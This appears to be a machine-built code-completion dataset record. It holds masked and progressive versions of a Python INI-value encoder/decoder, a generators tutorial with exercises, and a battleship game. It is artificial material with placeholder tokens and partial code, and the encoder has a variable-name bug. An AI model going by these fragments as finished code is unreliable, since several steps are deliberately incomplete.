"step-4": "decoded = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C',\n 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q',\n 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e',\n 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's',\n 't', 'u', 'v', 'w', 'x', 'y', 'z', '=', '.']\nencoded = ['49', '48', '4B', '4A', '4D', '4C', '4F', '4E', '41', '40', '38',\n '3B', '3A', '3D', '3C', '3F', '3E', '31', '30', '33', '32', '35', '34',\n '37', '36', '29', '28', '2B', '2A', '2D', '2C', '2F', '2E', '21', '20',\n '23', '18', '1B', '1A', '1D', '1C', '1F', '1E', '11', '10', '13', '12',\n '15', '14', '17', '16', '09', '08', '0B', '0A', '0D', '0C', '0F', '0E',\n '01', '00', '03', '44', '57']\n\n\ndef decode(value):\n out_value = ''\n char = [value[i:i + 2] for i in range(0, len(value), 2)]\n for i in range(0, len(char)):\n out_value += decoded[encoded.index(char[i])]\n return out_value\n\n\ndef encode(char):\n out_value = ''\n char = [value[i:i + 1] for i in range(0, len(value))]\n for i in range(0, len(char)):\n out_value += encoded[decoded.index(char[i])]\n return out_value\n\n\nif __name__ == '__main__':\n print(\n 'By default the program will open UserCustom.ini which should be in the directory as the program.'\n )\n user_input = str(input(\n 'Would you like to encode or decode UserCustom.ini ? (encode/decode) ')\n )\n const = '+CVars='\n config = open('UserCustom.ini', 'r')\n out_file = open('UserCustom.ini.out', 'w')\n out_value = ''\n lines = config.readlines()\n for i in range(0, len(lines)):\n if lines[i].startswith(const):\n value = lines[i].split(const)[-1].split('\\n')[0]\n if user_input.lower() == 'encode' or user_input.lower() == 'e':\n out_value = encode(value)\n elif user_input.lower() == 'decode' or user_input.lower() == 'd':\n out_value = decode(value)\n out_file.write(const + out_value + '\\n')\n else:\n out_file.write(lines[i])\n out_file.close()\n config.close()\n pass\n",
"step-5": "decoded = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"J\", \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"Q\", \"R\", \"S\", \"T\", \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\", \"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\", \"=\", \".\"]\nencoded = [\"49\", \"48\", \"4B\", \"4A\", \"4D\", \"4C\", \"4F\", \"4E\", \"41\", \"40\", \"38\", \"3B\", \"3A\", \"3D\", \"3C\", \"3F\", \"3E\", \"31\", \"30\", \"33\", \"32\", \"35\", \"34\", \"37\", \"36\", \"29\", \"28\", \"2B\", \"2A\", \"2D\", \"2C\", \"2F\", \"2E\", \"21\", \"20\", \"23\", \"18\", \"1B\", \"1A\", \"1D\", \"1C\", \"1F\", \"1E\", \"11\", \"10\", \"13\", \"12\", \"15\", \"14\", \"17\", \"16\", \"09\", \"08\", \"0B\", \"0A\", \"0D\", \"0C\", \"0F\", \"0E\", \"01\", \"00\", \"03\", \"44\", \"57\"]\n\ndef decode(value) : \n out_value = \"\"\n char = [value[i:i+2] for i in range(0, len(value), 2)]\n for i in range(0, len(char)) :\n out_value += decoded[encoded.index(char[i])]\n return out_value\n\ndef encode(char) : \n out_value = \"\"\n char = [value[i:i+1] for i in range(0, len(value))]\n for i in range(0, len(char)) :\n out_value += encoded[decoded.index(char[i])]\n return out_value\n\nif __name__ == \"__main__\" :\n print(\"By default the program will open UserCustom.ini which should be in the directory as the program.\")\n user_input = str(input(\"Would you like to encode or decode UserCustom.ini ? (encode/decode) \"))\n const = \"+CVars=\"\n config = open(\"UserCustom.ini\" , \"r\")\n out_file = open(\"UserCustom.ini.out\", \"w\")\n out_value = \"\"\n lines = config.readlines()\n for i in range(0, len(lines)) :\n if lines[i].startswith(const) :\n value = lines[i].split(const)[-1].split(\"\\n\")[0]\n if user_input.lower() == \"encode\" or user_input.lower() == \"e\" :\n out_value = encode(value)\n elif user_input.lower() == \"decode\" or user_input.lower() == \"d\" :\n out_value = decode(value)\n out_file.write(const + out_value + \"\\n\")\n else : \n out_file.write(lines[i]) \n out_file.close()\n config.close()\n pass",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
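
The parallel `decoded`/`encoded` lists in this record define a fixed substitution: each plain character maps to exactly one two-character hex token. A dict-based sketch of the same mapping (abbreviated alphabet; the tokens are copied from the lists above) with a round-trip check:

```python
decoded = ['0', '1', 'A', 'a', '=', '.']        # subset, for illustration
encoded = ['49', '48', '38', '18', '44', '57']  # the matching tokens
ENC = dict(zip(decoded, encoded))
DEC = dict(zip(encoded, decoded))

def encode(value):
    return ''.join(ENC[c] for c in value)

def decode(value):
    return ''.join(DEC[value[i:i + 2]] for i in range(0, len(value), 2))

assert encode('A1.') == '384857'
assert decode(encode('A1.')) == 'A1.'
```
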
<|reserved_special_token_0|>
def exercise_gen(ret_val, times):
    """Return `ret_val` `times` times.
    If the generator receives a value from outside, update `ret_val`"""
def exercise1():
"""Make it pass"""
g1 = exercise_gen(42, 3)
assert next(g1) == 42
assert g1.send('new val') == 'new val'
assert next(g1) == 'new val'
try:
next(g1)
except StopIteration:
pass
else:
raise Exception('Generator should be invalid')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def random_numbers():
print('start generator')
while True:
val = random()
print(f'will yield {val}')
yield val
<|reserved_special_token_0|>
def inout_gen():
print('init')
ret_val = None
while True:
x = yield ret_val
if x is not None:
ret_val = x
<|reserved_special_token_0|>
def exercise_gen(ret_val, times):
    """Return `ret_val` `times` times.
    If the generator receives a value from outside, update `ret_val`"""
def exercise1():
"""Make it pass"""
g1 = exercise_gen(42, 3)
assert next(g1) == 42
assert g1.send('new val') == 'new val'
assert next(g1) == 'new val'
try:
next(g1)
except StopIteration:
pass
else:
raise Exception('Generator should be invalid')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def random_numbers():
print('start generator')
while True:
val = random()
print(f'will yield {val}')
yield val
<|reserved_special_token_0|>
def inout_gen():
print('init')
ret_val = None
while True:
x = yield ret_val
if x is not None:
ret_val = x
def run_input_gen():
inout_g = inout_gen()
next(inout_g)
print(f'{next(inout_g)}')
print(f'{inout_g.send(22)}')
print(f'{next(inout_g)}')
def exercise_gen(ret_val, times):
    """Return `ret_val` `times` times.
    If the generator receives a value from outside, update `ret_val`"""
def exercise1():
"""Make it pass"""
g1 = exercise_gen(42, 3)
assert next(g1) == 42
assert g1.send('new val') == 'new val'
assert next(g1) == 'new val'
try:
next(g1)
except StopIteration:
pass
else:
raise Exception('Generator should be invalid')
def exercise2():
"""Update `exercise_gen`, so it will ignore all exceptions"""
g1 = exercise_gen("I'll ignore errors", 300)
assert next(g1) == "I'll ignore errors"
assert g1.send('new val') == 'new val'
assert g1.throw(Exception) == 'new val'
assert next(g1) == 'new val'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from random import random
def random_numbers():
print('start generator')
while True:
val = random()
print(f'will yield {val}')
yield val
def run_random_numbers():
print(f'random_numbers={random_numbers!r}')
rnd_gen = random_numbers()
print(f'rnd_gen={rnd_gen!r}')
print(f'next(rnd_gen)={next(rnd_gen)!r}')
print(f'next(rnd_gen)={next(rnd_gen)!r}')
print(f'rnd_gen.send(None)={rnd_gen.send(None)!r}')
print(f'rnd_gen.send(42)={rnd_gen.send(42)!r}')
def inout_gen():
print('init')
ret_val = None
while True:
x = yield ret_val
if x is not None:
ret_val = x
def run_input_gen():
inout_g = inout_gen()
next(inout_g)
print(f'{next(inout_g)}')
print(f'{inout_g.send(22)}')
print(f'{next(inout_g)}')
def exercise_gen(ret_val, times):
    """Return `ret_val` `times` times.
    If the generator receives a value from outside, update `ret_val`"""
def exercise1():
"""Make it pass"""
g1 = exercise_gen(42, 3)
assert next(g1) == 42
assert g1.send('new val') == 'new val'
assert next(g1) == 'new val'
try:
next(g1)
except StopIteration:
pass
else:
raise Exception('Generator should be invalid')
def exercise2():
"""Update `exercise_gen`, so it will ignore all exceptions"""
g1 = exercise_gen("I'll ignore errors", 300)
assert next(g1) == "I'll ignore errors"
assert g1.send('new val') == 'new val'
assert g1.throw(Exception) == 'new val'
assert next(g1) == 'new val'
if __name__ == '__main__':
run_random_numbers()
run_input_gen()
exercise1()
exercise2()
<|reserved_special_token_1|>
from random import random
def random_numbers():
print('start generator')
while True:
val = random()
print(f'will yield {val}')
yield val
def run_random_numbers():
print(f'{random_numbers=}')
rnd_gen = random_numbers()
print(f'{rnd_gen=}')
print(f'{next(rnd_gen)=}')
print(f'{next(rnd_gen)=}')
# but we can have two way communication
print(f'{rnd_gen.send(None)=}')
print(f'{rnd_gen.send(42)=}')
# rnd_gen.throw(Exception)
# rnd_gen.close()
# next(rnd_gen)
def inout_gen():
print('init')
ret_val = None
while True:
x = yield ret_val
if x is not None:
ret_val = x
def run_input_gen():
inout_g = inout_gen()
next(inout_g)
print(f'{next(inout_g)}')
print(f'{inout_g.send(22)}')
print(f'{next(inout_g)}')
def exercise_gen(ret_val, times):
    """Return `ret_val` `times` times.
    If the generator receives a value from outside, update `ret_val`"""
def exercise1():
"""Make it pass"""
g1 = exercise_gen(42, 3)
assert next(g1) == 42
assert g1.send('new val') == 'new val'
assert next(g1) == 'new val'
try:
next(g1)
except StopIteration:
# ok
pass
else:
raise Exception('Generator should be invalid')
def exercise2():
"""Update `exercise_gen`, so it will ignore all exceptions"""
g1 = exercise_gen("I'll ignore errors", 300)
assert next(g1) == "I'll ignore errors"
assert g1.send('new val') == 'new val'
assert g1.throw(Exception) == 'new val'
assert next(g1) == 'new val'
if __name__ == '__main__':
run_random_numbers()
run_input_gen()
exercise1()
exercise2()
|
flexible
|
{
"blob_id": "e5979aeb7cff0e2a75966924382bae87aebcfcb2",
"index": 3312,
"step-1": "<mask token>\n\n\ndef exercise_gen(ret_val, times):\n \"\"\"Return `ret_value` `times` times.\n If generator will receive some value from outside, update `ret_value`\"\"\"\n\n\ndef exercise1():\n \"\"\"Make it pass\"\"\"\n g1 = exercise_gen(42, 3)\n assert next(g1) == 42\n assert g1.send('new val') == 'new val'\n assert next(g1) == 'new val'\n try:\n next(g1)\n except StopIteration:\n pass\n else:\n raise Exception('Generator should be invalid')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef random_numbers():\n print('start generator')\n while True:\n val = random()\n print(f'will yield {val}')\n yield val\n\n\n<mask token>\n\n\ndef inout_gen():\n print('init')\n ret_val = None\n while True:\n x = yield ret_val\n if x is not None:\n ret_val = x\n\n\n<mask token>\n\n\ndef exercise_gen(ret_val, times):\n \"\"\"Return `ret_value` `times` times.\n If generator will receive some value from outside, update `ret_value`\"\"\"\n\n\ndef exercise1():\n \"\"\"Make it pass\"\"\"\n g1 = exercise_gen(42, 3)\n assert next(g1) == 42\n assert g1.send('new val') == 'new val'\n assert next(g1) == 'new val'\n try:\n next(g1)\n except StopIteration:\n pass\n else:\n raise Exception('Generator should be invalid')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef random_numbers():\n print('start generator')\n while True:\n val = random()\n print(f'will yield {val}')\n yield val\n\n\n<mask token>\n\n\ndef inout_gen():\n print('init')\n ret_val = None\n while True:\n x = yield ret_val\n if x is not None:\n ret_val = x\n\n\ndef run_input_gen():\n inout_g = inout_gen()\n next(inout_g)\n print(f'{next(inout_g)}')\n print(f'{inout_g.send(22)}')\n print(f'{next(inout_g)}')\n\n\ndef exercise_gen(ret_val, times):\n \"\"\"Return `ret_value` `times` times.\n If generator will receive some value from outside, update `ret_value`\"\"\"\n\n\ndef exercise1():\n \"\"\"Make it pass\"\"\"\n g1 = exercise_gen(42, 3)\n assert next(g1) == 42\n assert g1.send('new val') == 'new val'\n assert next(g1) == 'new val'\n try:\n next(g1)\n except StopIteration:\n pass\n else:\n raise Exception('Generator should be invalid')\n\n\ndef exercise2():\n \"\"\"Update `exercise_gen`, so it will ignore all exceptions\"\"\"\n g1 = exercise_gen(\"I'll ignore errors\", 300)\n assert next(g1) == \"I'll ignore errors\"\n assert g1.send('new val') == 'new val'\n assert g1.throw(Exception) == 'new val'\n assert next(g1) == 'new val'\n\n\n<mask token>\n",
"step-4": "from random import random\n\n\ndef random_numbers():\n print('start generator')\n while True:\n val = random()\n print(f'will yield {val}')\n yield val\n\n\ndef run_random_numbers():\n print(f'random_numbers={random_numbers!r}')\n rnd_gen = random_numbers()\n print(f'rnd_gen={rnd_gen!r}')\n print(f'next(rnd_gen)={next(rnd_gen)!r}')\n print(f'next(rnd_gen)={next(rnd_gen)!r}')\n print(f'rnd_gen.send(None)={rnd_gen.send(None)!r}')\n print(f'rnd_gen.send(42)={rnd_gen.send(42)!r}')\n\n\ndef inout_gen():\n print('init')\n ret_val = None\n while True:\n x = yield ret_val\n if x is not None:\n ret_val = x\n\n\ndef run_input_gen():\n inout_g = inout_gen()\n next(inout_g)\n print(f'{next(inout_g)}')\n print(f'{inout_g.send(22)}')\n print(f'{next(inout_g)}')\n\n\ndef exercise_gen(ret_val, times):\n \"\"\"Return `ret_value` `times` times.\n If generator will receive some value from outside, update `ret_value`\"\"\"\n\n\ndef exercise1():\n \"\"\"Make it pass\"\"\"\n g1 = exercise_gen(42, 3)\n assert next(g1) == 42\n assert g1.send('new val') == 'new val'\n assert next(g1) == 'new val'\n try:\n next(g1)\n except StopIteration:\n pass\n else:\n raise Exception('Generator should be invalid')\n\n\ndef exercise2():\n \"\"\"Update `exercise_gen`, so it will ignore all exceptions\"\"\"\n g1 = exercise_gen(\"I'll ignore errors\", 300)\n assert next(g1) == \"I'll ignore errors\"\n assert g1.send('new val') == 'new val'\n assert g1.throw(Exception) == 'new val'\n assert next(g1) == 'new val'\n\n\nif __name__ == '__main__':\n run_random_numbers()\n run_input_gen()\n exercise1()\n exercise2()\n",
"step-5": "from random import random\n\n\ndef random_numbers():\n print('start generator')\n while True:\n val = random()\n print(f'will yield {val}')\n yield val\n\n\ndef run_random_numbers():\n print(f'{random_numbers=}')\n rnd_gen = random_numbers()\n print(f'{rnd_gen=}')\n print(f'{next(rnd_gen)=}')\n print(f'{next(rnd_gen)=}')\n\n # but we can have two way communication\n print(f'{rnd_gen.send(None)=}')\n print(f'{rnd_gen.send(42)=}')\n # rnd_gen.throw(Exception)\n # rnd_gen.close()\n # next(rnd_gen)\n\n\ndef inout_gen():\n print('init')\n ret_val = None\n while True:\n x = yield ret_val\n if x is not None:\n ret_val = x\n\n\ndef run_input_gen():\n inout_g = inout_gen()\n next(inout_g)\n\n print(f'{next(inout_g)}')\n print(f'{inout_g.send(22)}')\n print(f'{next(inout_g)}')\n\n\ndef exercise_gen(ret_val, times):\n \"\"\"Return `ret_value` `times` times.\n If generator will receive some value from outside, update `ret_value`\"\"\"\n\n\ndef exercise1():\n \"\"\"Make it pass\"\"\"\n g1 = exercise_gen(42, 3)\n assert next(g1) == 42\n assert g1.send('new val') == 'new val'\n assert next(g1) == 'new val'\n try:\n next(g1)\n except StopIteration:\n # ok\n pass\n else:\n raise Exception('Generator should be invalid')\n\n\ndef exercise2():\n \"\"\"Update `exercise_gen`, so it will ignore all exceptions\"\"\"\n g1 = exercise_gen(\"I'll ignore errors\", 300)\n assert next(g1) == \"I'll ignore errors\"\n assert g1.send('new val') == 'new val'\n assert g1.throw(Exception) == 'new val'\n assert next(g1) == 'new val'\n\n\nif __name__ == '__main__':\n run_random_numbers()\n run_input_gen()\n exercise1()\n exercise2()\n",
"step-ids": [
2,
4,
6,
9,
10
]
}
|
[
2,
4,
6,
9,
10
] |
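
For reference, one body for the `exercise_gen` stub that makes both `exercise1` and `exercise2` pass (a sketch, not the record's own solution): yield `ret_val` once per round, absorb values passed in via `.send()`, and swallow exceptions thrown in via `.throw()` by re-yielding:

```python
def exercise_gen(ret_val, times):
    """Return `ret_val` `times` times.
    If the generator receives a value from outside, update `ret_val`."""
    for _ in range(times):
        while True:
            try:
                received = yield ret_val
                break
            except Exception:
                continue          # exercise2: ignore exceptions thrown in
        if received is not None:  # exercise1: .send(x) updates the value
            ret_val = received
```
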
from random import randrange
import random
"""
both user and computer funcs:
"""
def check_ok(boat, taken_positions):
# input: boat, taken_positions
    # this func checks if the boat is outside the playground or if its position is already in taken_positions
    # return: boat. boat will be returned as [-1] or with its specific position
boat.sort()
for i in range(len(boat)):
if boat[i] in taken_positions:
#this condition checks if the block boat[i] is already in the list taken_positions
boat = [-1]
break
elif boat[i] > 99 or boat[i] < 0:
#this condition checks border 1 and 3
boat = [-1]
break
elif boat[i] % 10 == 9 and i < len(boat) - 1:
#this condition checks border 2 and 4
if boat[i + 1] % 10 == 0:
boat = [-1]
break
if i != 0:
# this condition checks if there is any hole in the boat
if boat[i] != boat[i - 1] + 1 and boat[i] != boat[i - 1] + 10:
boat = [-1]
break
return boat
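# e.g. check_ok([8, 9], []) -> [8, 9] (a valid two-block boat), while
# check_ok([9, 10], []) -> [-1] because the boat would wrap around a row edge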
def check_shot(shot, ships, hit, miss, comp, sinked_boats):
# input: shot, all the boats (ships), hit, miss, comp, sinked_boats
# this func initially assumes that the shot is missed (cond = 0)
# given a shot, this func uses a for-loop that goes through all ships to see if the shot hits one of the ships
    # if yes, remove the block of the boat that is hit by the shot
# append the shot to hit or comp. If comp, sinked_boats += 1
# if not, append the shot to miss
# return: all the boats (ships), hit, miss, comp, cond, sinked_boats
cond = 0 # miss
for i in range(len(ships)):
if shot in ships[i]:
ships[i].remove(shot)
if len(ships[i]) > 0:
hit.append(shot)
cond = 1 # hit
else:
comp.append(shot)
cond = 2 # comp
sinked_boats += 1
if cond == 0: # miss
miss.append(shot)
return ships, hit, miss, comp, cond, sinked_boats
def create_playground(hit, miss, comp):
# input: hit, miss, comp
# this func creates the playground with the status of each block
# print the playground
print(" battleship")
print(" 0 1 2 3 4 5 6 7 8 9")
    block = 0 #this variable keeps track of the spot of the block
for i in range(10):
#create each row
row = ""
for j in range(10):
#create each spot on the specific row
character = "_ "
if block in miss:
character = "x "
elif block in hit:
character = "o "
elif block in comp:
character = "Q "
row += character
            block += 1 #the block var increments 1 after each character is added to row
print(i, " ", row)
print("")
def check_empty(ships):
# input: ships
    # an empty list is falsy; a list with elements is truthy ([] -> False, [x] -> True)
# this func checks each ship in the 2D list ships
# if ship is empty, return True, and vice versa
# if all ships are empty, return True, else return False
# return True or False
return all([not elem for elem in ships])
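# e.g. check_empty([[], []]) -> True (every boat fully sunk); check_empty([[7], []]) -> False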
"""
user - 2 funcs:
"""
def create_ships_u(taken_positions, num_boats):
# input: num_boats
# this func has a loop that makes all boats,
    # which calls get_ship(len_of_boat, taken_positions) to create a single boat
    # return: ships, a 2D list of length len(num_boats) that contains the positions of all boats
ships = [] #this is a 2D list contains the positions of all boats
for len_of_boat in num_boats:
ship, taken_positions = get_ship(len_of_boat, taken_positions)
ships.append(ship)
return ships, taken_positions
def create_playground_u(taken_positions):
print(" battleships ")
print(" 0 1 2 3 4 5 6 7 8 9")
place = 0
for x in range(10):
row = ""
for y in range(10):
ch = " _ "
if place in taken_positions:
ch = " o "
row = row + ch
place = place + 1
print(x," ",row)
def get_ship(len_of_boat, taken_positions):
# input: len_of_boat, taken_positions
# this func gets the boat's position from the user's input
    # this func checks both the type of the input (is it an int) and whether the boat is inside the playground, not in taken_positions, and in the correct order
# return a valid ship
while True:
ship = []
print("enter your ship of length", len_of_boat)
for i in range(len_of_boat):
while True:
try:
boat_num = input("please enter a number: ")
ship.append(int(boat_num))
except ValueError: # better try again... Return to the start of the loop
print("wrong type of input")
continue
                else: # it is a correct input, and we're ready to exit the loop
break
ship = check_ok(ship, taken_positions)
if -1 not in ship: # check if a ship is valid. If yes, add the ship to taken_positions and break
taken_positions += ship
break
else:
print("invalid number - please enter again")
return ship, taken_positions
def get_shot_user(guesses):
# input: guesses is the combined list of hit, miss, comp
    # this func asks the user to enter the shot, then checks the validity of the shot
# return: the valid shot
while True:
try:
shot = int(input("Enter your shot: "))
            if shot < 0 or shot > 99:
                print("shot must be between 0 and 99 - please enter again")
elif shot in guesses:
print("already guessed - please enter again")
else:
return shot
except:
print("incorrect - please enter integer only")
"""
computer - 1 funcs:
"""
def create_ships_c(taken_positions, num_boats):
# input: num_boats
    # this func has a loop that makes all boats,
    # which calls create_boat() to create a single boat
    # return: ships, a 2D list of length len(num_boats) that contains the positions of all boats
ships = [] #this is a 2D list contains the positions of all boats
for len_of_boat in num_boats:
boat_position = [-1] #create the initial position of every boat is [-1]
while -1 in boat_position:
            boat_start = randrange(100) #boat starting point (0-99)
            boat_direction = randrange(1, 5) #{1: "up", 2: "right", 3: "down", 4: "left"}
boat_position = create_boat(len_of_boat, boat_start, boat_direction, taken_positions) #return the position of boat
#a new boat is created after finishing the while loop
ships.append(boat_position)
taken_positions += boat_position #add all positions of the newly created boat to the list taken_positions
return ships, taken_positions
def create_boat(len_of_boat, boat_start, boat_direction, taken_positions):
# input: len_of_boat, boat_start, boat_direction, taken_positions
# this func initializes boat = []
# with len_of_boat, boat_start, boat_direction, this func create the position of the boat
# calls check_ok(boat, taken_positions) to see if the boat outside playground or the position of the boat is already in taken_position
# return: boat. boat will returned as [-1] or its specific position
boat = []
if boat_direction == 1:
for i in range(len_of_boat):
boat.append(boat_start - i * 10) # already have the position of boat after this line
boat = check_ok(boat, taken_positions)
elif boat_direction == 2:
for i in range(len_of_boat):
boat.append(boat_start + i)
boat = check_ok(boat, taken_positions)
elif boat_direction == 3:
for i in range(len_of_boat):
boat.append(boat_start + i * 10)
boat = check_ok(boat, taken_positions)
elif boat_direction == 4:
for i in range(len_of_boat):
boat.append(boat_start - i)
boat = check_ok(boat, taken_positions)
return boat
def get_shot_comp(guesses, tactics):
# input: guesses (all moves), tactics(which is the list of all valid possible moves for the shot)
    # in the first move, tactics = []
# this func checks if len(tactics) > 0
# if yes, pick shot = tactics[0]
# if no, pick shot = randrange(99)
# this func check if shot not in guesses(which is the list of all moves)
# if yes, guess.append(shot), and break
# return: the valid shot, guesses
while True:
try:
if len(tactics) > 0:
shot = tactics[0]
else:
                shot = randrange(100)
if shot not in guesses:
guesses.append(shot)
break
except:
print("incorrect - please enter integer only")
return shot, guesses
def calculate_tactics(shot, tactics, guesses, hit):
# input: shot, tactics, guesses, hit
# this function takes the newly shot, and changes the tactics list accordingly
# the list temp is the possible positions that the next shot can be
# if the shot hits the first time, len(tactics) = 0. Then, temp is the list contains 4 blocks around the shot
# else, the list temp will be created based on the last 2 shots
# candidate is the list of valid possible shots that is created from temp
# shuffle the order of elements inside candidate
# return: candidate (candidate is tactics)
temp = []
if len(tactics) < 1:
# got 1 hit the first time
temp = [shot - 1, shot + 1, shot - 10, shot + 10] # temporary places that the next shot could be
else:
# got at least 2 hits
        # checks to see if the 4 spots around are in hit
if shot - 1 in hit: # east
temp = [shot + 1]
for num in [2, 3, 4, 5, 6, 7, 8]:
if shot - num not in hit:
temp.append(shot - num)
break
elif shot + 1 in hit: # west
temp = [shot - 1]
for num in [2, 3, 4, 5, 6, 7, 8]:
if shot + num not in hit:
temp.append(shot + num)
break
elif shot - 10 in hit: # south
temp = [shot + 10]
for num in [20, 30, 40, 50, 60, 70, 80]:
if shot - num not in hit:
temp.append(shot - num)
break
elif shot + 10 in hit: # north. Ex: first shot is 50, next shot is 40
temp = [shot - 10]
for num in [20, 30, 40, 50, 60, 70, 80]:
if shot + num not in hit:
temp.append(shot + num)
break
candidate = [] # list of valid places that the next shot could be
for i in range(len(temp)):
if temp[i] not in guesses and temp[i] < 100 and temp[i] > -1: #checks the validity of places in temp
candidate.append(temp[i])
random.shuffle(candidate) # shuffle the element order of the list candidate
return candidate
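# quick sanity check (hypothetical, not part of the game): after a first hit on 45
# with no other guesses, the four orthogonal neighbours come back in shuffled order:
# calculate_tactics(45, [], [45], [45]) -> some ordering of [35, 44, 46, 55]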
"""
main program:
"""
num_boats = [5, 4, 3, 3, 2, 2] # this list contains all boats. Each boat is represented by its length
# before game
# computer - 1
hit1 = []
miss1 = []
comp1 = []
guesses1 = []
cond1 = 0
tactics1 = [] # list of possible moves after a boat is hit. After a boat is sunk, tactics reset to []
taken_positions1 = []
sinked_boats1 = 0 # counter; check_shot increments it with += 1
# user - 2
hit2 = []
miss2 = []
comp2 = []
guesses2 = []
cond2 = 0
tactics2 = []
taken_positions2 = []
sinked_boats2 = 0 # counter; check_shot increments it with += 1
# computer creates ships for player 1
ships1, taken_positions1 = create_ships_c(taken_positions1, num_boats)
# user creates boat for player 2 - show board
ships2, taken_positions2 = create_ships_u(taken_positions2, num_boats)
create_playground_u(taken_positions2)
# loop in which the user and computer take turns to shoot; repeat until there is a winner:
turns = 0
while True:
turns += 1
    # USER SHOOTS: the *1 data belongs to the computer, which the user shoots at
guesses1 = hit1 + miss1 + comp1
shot1 = get_shot_user(guesses1)
ships1, hit1, miss1, comp1, cond1, sinked_boats1 = check_shot(shot1, ships1, hit1, miss1, comp1, sinked_boats1)
create_playground(hit1, miss1, comp1)
# check if all of the computer ships are empty:
if check_empty(ships1):
        print("end of game - user wins in", turns)
break
# COMPUTER SHOOTS:
guesses2 = hit2 + miss2 + comp2
shot2, guesses2 = get_shot_comp(guesses2, tactics2)
ships2, hit2, miss2, comp2, cond2, sinked_boats2 = check_shot(shot2, ships2, hit2, miss2, comp2, sinked_boats2)
create_playground(hit2, miss2, comp2)
if cond2 == 1:
# got 1 hit
tactics2 = calculate_tactics(shot2, tactics2, guesses2, hit2)
elif cond2 == 2:
# comp, and sunk the boat
# reset tactics = []
tactics2 = []
elif len(tactics2) > 0: #len(tactics) > 0 means that there are still possible moves
# got 1 hit, then miss
# remove the newly shot from tactics
tactics2.pop(0)
# in case all 3 statements above are False, which means there is no hit in the first place, tactics is still []
    # check if all of the user's ships are empty:
if check_empty(ships2):
print("end of game - computer wins in", turns)
break
# after both the user and computer shoot, start a new loop:
|
normal
|
{
"blob_id": "95584dfdb232be7f507dc9d29ed2f1d95fa2b653",
"index": 9642,
"step-1": "<mask token>\n\n\ndef check_ok(boat, taken_positions):\n boat.sort()\n for i in range(len(boat)):\n if boat[i] in taken_positions:\n boat = [-1]\n break\n elif boat[i] > 99 or boat[i] < 0:\n boat = [-1]\n break\n elif boat[i] % 10 == 9 and i < len(boat) - 1:\n if boat[i + 1] % 10 == 0:\n boat = [-1]\n break\n if i != 0:\n if boat[i] != boat[i - 1] + 1 and boat[i] != boat[i - 1] + 10:\n boat = [-1]\n break\n return boat\n\n\ndef check_shot(shot, ships, hit, miss, comp, sinked_boats):\n cond = 0\n for i in range(len(ships)):\n if shot in ships[i]:\n ships[i].remove(shot)\n if len(ships[i]) > 0:\n hit.append(shot)\n cond = 1\n else:\n comp.append(shot)\n cond = 2\n sinked_boats += 1\n if cond == 0:\n miss.append(shot)\n return ships, hit, miss, comp, cond, sinked_boats\n\n\n<mask token>\n\n\ndef check_empty(ships):\n return all([(not elem) for elem in ships])\n\n\n<mask token>\n\n\ndef create_ships_u(taken_positions, num_boats):\n ships = []\n for len_of_boat in num_boats:\n ship, taken_positions = get_ship(len_of_boat, taken_positions)\n ships.append(ship)\n return ships, taken_positions\n\n\n<mask token>\n\n\ndef create_ships_c(taken_positions, num_boats):\n ships = []\n for len_of_boat in num_boats:\n boat_position = [-1]\n while -1 in boat_position:\n boat_start = randrange(99)\n boat_direction = randrange(1, 4)\n boat_position = create_boat(len_of_boat, boat_start,\n boat_direction, taken_positions)\n ships.append(boat_position)\n taken_positions += boat_position\n return ships, taken_positions\n\n\ndef create_boat(len_of_boat, boat_start, boat_direction, taken_positions):\n boat = []\n if boat_direction == 1:\n for i in range(len_of_boat):\n boat.append(boat_start - i * 10)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 2:\n for i in range(len_of_boat):\n boat.append(boat_start + i)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 3:\n for i in range(len_of_boat):\n boat.append(boat_start + i * 10)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 4:\n for i in range(len_of_boat):\n boat.append(boat_start - i)\n boat = check_ok(boat, taken_positions)\n return boat\n\n\ndef get_shot_comp(guesses, tactics):\n while True:\n try:\n if len(tactics) > 0:\n shot = tactics[0]\n else:\n shot = randrange(99)\n if shot not in guesses:\n guesses.append(shot)\n break\n except:\n print('incorrect - please enter integer only')\n return shot, guesses\n\n\n<mask token>\n",
